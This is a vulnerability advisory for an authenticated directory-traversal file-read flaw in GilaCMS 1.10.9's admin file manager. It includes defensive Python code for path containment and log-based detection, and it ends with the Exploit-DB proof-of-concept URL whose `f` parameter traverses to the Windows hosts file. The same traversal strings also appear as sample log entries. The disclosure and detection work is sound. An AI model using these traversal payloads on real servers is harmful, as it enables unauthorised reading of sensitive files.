Vendor: GilaCMS
By: Sainadh Jamalpur
CVSS: 4.9 (MEDIUM)
Title: Authenticated Local File Inclusion (LFI)
CWE: 22
Product Name: GilaCMS
Affected Version From: 1.10.9
Affected Version To: 1.10.9
Patch Exists: YES
Related CVE: CVE-2019-16679
CPE: a:gila_cms:gila_cms:1.10.9
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: XAMPP version 3.2.2 in Windows 10 64bit
Year: 2019

Authenticated Local File Inclusion (LFI) in GilaCMS

An authenticated Local File Inclusion (LFI) vulnerability exists in GilaCMS version 1.10.9. The `f` parameter of the admin file manager (`/admin/fm/`) is not restricted to the intended directory, so an authenticated user with access to that page can send a crafted request containing directory traversal sequences and read an arbitrary local file on the server. This can lead to disclosure of sensitive information.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of GilaCMS.
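The root cause of this class of bug is a file-manager parameter that is joined onto a base directory without confirming that the result still lies inside it. The following is an added example, not code from GilaCMS or from the advisory author: `resolve_within` shows the containment check a file manager should perform on a user-supplied relative path (the hypothetical `BASE_DIR` and the lexical normalisation are assumptions, not GilaCMS's real layout or code), and `flag_traversal_requests` shows how a defender can spot traversal attempts against `/admin/fm/` in Apache-style access logs; the log lines are constructed for the example.

```python
import posixpath
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

# Hypothetical document root for the file manager (assumption for this example).
BASE_DIR = "/var/www/gila/src"


def resolve_within(base_dir: str, user_path: str) -> Optional[str]:
    """Return the normalised absolute path for user_path if it stays inside
    base_dir, otherwise None.

    The check is purely lexical (no filesystem access), so it also works for
    paths that do not exist yet and does not follow symlinks; pair it with a
    realpath()-based check if symlinks inside base_dir are a concern.
    """
    if "\x00" in user_path:
        return None
    # Treat backslashes as separators so Windows-style traversal is caught too.
    candidate = user_path.replace("\\", "/")
    # Only relative names are acceptable: reject absolute paths and drive letters.
    if candidate.startswith("/") or re.match(r"^[A-Za-z]:", candidate):
        return None
    base = posixpath.normpath(base_dir)
    full = posixpath.normpath(posixpath.join(base, candidate))
    # Containment test on the normalised path, after all ".." have been applied.
    if full != base and not full.startswith(base + "/"):
        return None
    return full


# Constructed Apache combined-format lines; the second and third carry traversal
# payloads (one plain, one URL-encoded), the others are benign.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [04/Aug/2019:10:01:02 +0000] "GET /gilacms/admin/fm/?f=src/themes HTTP/1.1" 200 512',
    '10.0.0.5 - - [04/Aug/2019:10:01:09 +0000] "GET /gilacms/admin/fm/?f=src../../../../../../../../../WINDOWS/system32/drivers/etc/hosts HTTP/1.1" 200 1337',
    '10.0.0.7 - - [04/Aug/2019:10:02:11 +0000] "GET /gilacms/admin/fm/?f=src%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 980',
    '10.0.0.9 - - [04/Aug/2019:10:03:00 +0000] "GET /gilacms/index.php HTTP/1.1" 200 2048',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<url>\S+) HTTP/[\d.]+"')
# A ".." component bounded by path separators (or string start/end).
TRAVERSAL_RE = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")


def flag_traversal_requests(log_lines: List[str]) -> List[Tuple[str, str]]:
    """Return (client_ip, decoded f value) for requests to the file manager
    whose f parameter contains a directory traversal sequence."""
    hits: List[Tuple[str, str]] = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        parsed = urlsplit(m.group("url"))
        if "/admin/fm" not in parsed.path:
            continue
        for value in parse_qs(parsed.query).get("f", []):
            # parse_qs decoded once; decode again to catch double-encoded input.
            decoded = unquote(value)
            if TRAVERSAL_RE.search(decoded):
                hits.append((line.split()[0], decoded))
    return hits


if __name__ == "__main__":
    print(resolve_within(BASE_DIR, "themes/default"))
    print(resolve_within(BASE_DIR, "src../../../../../../../../../WINDOWS/system32/drivers/etc/hosts"))
    for ip, f in flag_traversal_requests(SAMPLE_LOG_LINES):
        print(f"traversal attempt from {ip}: f={f}")
```

The containment test is done on the normalised result rather than by blacklisting `..` in the input, so variations such as `src../../`, backslash separators or mixed encodings all resolve to the same verdict; the log detector decodes the parameter twice because a single decode is what the web server itself applies.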

Exploit-DB raw data:

# Exploit Title: Authenticated Local File Inclusion(LFI) in GilaCMS
# Google Dork: N/A
# Date: 04-08-2019
# Exploit Author: Sainadh Jamalpur
# Vendor Homepage: https://github.com/GilaCMS/gila
# Software Link: https://github.com/GilaCMS/gila
# Version: 1.10.9
# Tested on: XAMPP version 3.2.2 in Windows 10 64bit,
# CVE : CVE-2019-16679

*********** *Steps to reproduce the Vulnerability* *************

Log in to the application as an admin user or an equivalent user and go to the
link below

http://localhost/gilacms/admin/fm/?f=src../../../../../../../../../WINDOWS/system32/drivers/etc/hosts

################################################################